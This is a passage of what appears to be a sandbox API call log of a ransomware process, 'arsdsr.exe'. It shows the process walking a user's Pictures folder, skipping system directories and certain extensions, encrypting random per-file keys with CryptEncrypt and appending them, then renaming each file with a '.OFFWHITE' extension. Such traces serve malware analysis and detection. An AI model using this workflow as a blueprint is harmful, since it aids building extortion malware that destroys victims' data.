lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif.OFFWHITE" [0135.865] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lil1rw-b1p8kkk9rqlv.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LIl1rW-b1p8kKK9RqLv.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lil1rw-b1p8kkk9rqlv.gif.offwhite")) returned 1 [0135.866] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbf50200, ftCreationTime.dwHighDateTime=0x1d5d965, ftLastAccessTime.dwLowDateTime=0x56323210, ftLastAccessTime.dwHighDateTime=0x1d5dbc8, ftLastWriteTime.dwLowDateTime=0x56323210, ftLastWriteTime.dwHighDateTime=0x1d5dbc8, nFileSizeHigh=0x0, nFileSizeLow=0x10848, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="LuSpGx9q.jpg", cAlternateFileName="")) returned 1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2=".") returned 1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="..") returned 1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="...") returned 1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="windows") returned -1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="$recycle.bin") returned 1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="rsa") returned -1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="ntuser.dat") returned -1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="programdata") returned -1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="appdata") returned 1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="program files") returned -1 [0135.866] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="program files (x86)") returned -1 [0135.866] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.866] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="LuSpGx9q.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg" [0135.866] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.866] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.866] PathFindExtensionW (pszPath="LuSpGx9q.jpg") returned=".jpg" [0135.866] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.866] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.866] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.866] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.866] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.866] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.866] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.867] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.867] lstrcmpiW (lpString1="LuSpGx9q.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.867] GetProcessHeap () returned 0x500000 [0135.867] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f80 [0135.867] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\luspgx9q.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.867] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=67656) returned 1 [0135.867] GetProcessHeap () returned 0x500000 [0135.867] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.867] GetProcessHeap () returned 0x500000 [0135.867] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.867] GetProcessHeap () returned 0x500000 [0135.867] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.867] GetProcessHeap () returned 0x500000 [0135.868] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.868] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.868] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.868] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.868] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.868] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.868] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.868] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.868] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.868] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.868] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.868] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.869] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.869] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10848, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.869] SetLastError (dwErrCode=0x0) [0135.869] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.871] GetLastError () returned 0x0 [0135.871] GetLastError () returned 0x0 [0135.871] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10948, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.871] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.871] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x10a48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.871] WriteFile (in: hFile=0xb0, lpBuffer=0x521f80*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521f80*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.871] GetProcessHeap () returned 0x500000 [0135.871] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10848) returned 0x55a7b8 [0135.871] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.871] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x10848, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x10848, lpOverlapped=0x0) returned 1 [0135.876] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.876] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x10848, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x10848, lpOverlapped=0x0) returned 1 [0135.877] GetProcessHeap () returned 0x500000 [0135.877] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.877] CloseHandle (hObject=0xb0) returned 1 [0135.878] GetProcessHeap () returned 0x500000 [0135.879] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.879] GetProcessHeap () returned 0x500000 [0135.879] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.879] GetProcessHeap () returned 0x500000 [0135.879] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.879] GetProcessHeap () returned 0x500000 [0135.879] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.879] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg" [0135.879] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg.OFFWHITE" [0135.879] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\luspgx9q.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LuSpGx9q.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\luspgx9q.jpg.offwhite")) returned 1 [0135.880] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x350aef80, ftCreationTime.dwHighDateTime=0x1d5e804, ftLastAccessTime.dwLowDateTime=0x97a57c40, ftLastAccessTime.dwHighDateTime=0x1d5e427, ftLastWriteTime.dwLowDateTime=0x97a57c40, ftLastWriteTime.dwHighDateTime=0x1d5e427, nFileSizeHigh=0x0, nFileSizeLow=0x12603, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="pLqndGw.gif", cAlternateFileName="")) returned 1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2=".") returned 1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="..") returned 1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="...") returned 1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="windows") returned -1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="$recycle.bin") returned 1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="rsa") returned -1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="ntuser.dat") returned 1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="programdata") returned -1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="appdata") returned 1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="program files") returned -1 [0135.880] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="program files (x86)") returned -1 [0135.880] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.880] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="pLqndGw.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif" [0135.880] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.880] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.880] PathFindExtensionW (pszPath="pLqndGw.gif") returned=".gif" [0135.880] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.881] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.881] lstrcmpiW (lpString1="pLqndGw.gif", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.881] GetProcessHeap () returned 0x500000 [0135.881] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f90 [0135.881] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\plqndgw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.882] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=75267) returned 1 [0135.882] GetProcessHeap () returned 0x500000 [0135.882] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.882] GetProcessHeap () returned 0x500000 [0135.882] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.882] GetProcessHeap () returned 0x500000 [0135.882] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.882] GetProcessHeap () returned 0x500000 [0135.882] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.882] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.882] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.882] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.882] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.882] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.882] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.882] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.882] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.882] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.883] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.883] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.883] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.883] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12603, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.883] SetLastError (dwErrCode=0x0) [0135.883] WriteFile (in: hFile=0xb0, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.888] GetLastError () returned 0x0 [0135.888] GetLastError () returned 0x0 [0135.888] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12703, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.888] WriteFile (in: hFile=0xb0, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.888] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12803, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.888] WriteFile (in: hFile=0xb0, lpBuffer=0x521f90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521f90*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.888] GetProcessHeap () returned 0x500000 [0135.888] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x12603) returned 0x55a7b8 [0135.888] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.888] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x12603, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x12603, lpOverlapped=0x0) returned 1 [0135.894] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.894] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x12603, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x12603, lpOverlapped=0x0) returned 1 [0135.894] GetProcessHeap () returned 0x500000 [0135.894] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.894] CloseHandle (hObject=0xb0) returned 1 [0135.900] GetProcessHeap () returned 0x500000 [0135.900] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.900] GetProcessHeap () returned 0x500000 [0135.900] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.900] GetProcessHeap () returned 0x500000 [0135.900] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.900] GetProcessHeap () returned 0x500000 [0135.900] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.900] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif" [0135.900] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif.OFFWHITE" [0135.900] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\plqndgw.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pLqndGw.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\plqndgw.gif.offwhite")) returned 1 [0135.901] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc23519e0, ftCreationTime.dwHighDateTime=0x1d5de44, ftLastAccessTime.dwLowDateTime=0x3b82ab50, ftLastAccessTime.dwHighDateTime=0x1d5e53e, ftLastWriteTime.dwLowDateTime=0x3b82ab50, ftLastWriteTime.dwHighDateTime=0x1d5e53e, nFileSizeHigh=0x0, nFileSizeLow=0xd720, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="sM fyD56UIoXA0Vt.jpg", cAlternateFileName="SMFYD5~1.JPG")) returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2=".") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="..") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="...") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="windows") returned -1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="$recycle.bin") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="rsa") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="ntuser.dat") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="programdata") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="appdata") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="program files") returned 1 [0135.901] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="program files (x86)") returned 1 [0135.901] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.901] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="sM fyD56UIoXA0Vt.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg" [0135.901] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.901] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.901] PathFindExtensionW (pszPath="sM fyD56UIoXA0Vt.jpg") returned=".jpg" [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.902] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.902] lstrcmpiW (lpString1="sM fyD56UIoXA0Vt.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.902] GetProcessHeap () returned 0x500000 [0135.902] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521fa0 [0135.902] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sM fyD56UIoXA0Vt.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sm fyd56uioxa0vt.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.903] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=55072) returned 1 [0135.903] GetProcessHeap () returned 0x500000 [0135.903] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.903] GetProcessHeap () returned 0x500000 [0135.903] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.903] GetProcessHeap () returned 0x500000 [0135.903] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.903] GetProcessHeap () returned 0x500000 [0135.903] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.903] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.903] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.903] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.903] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 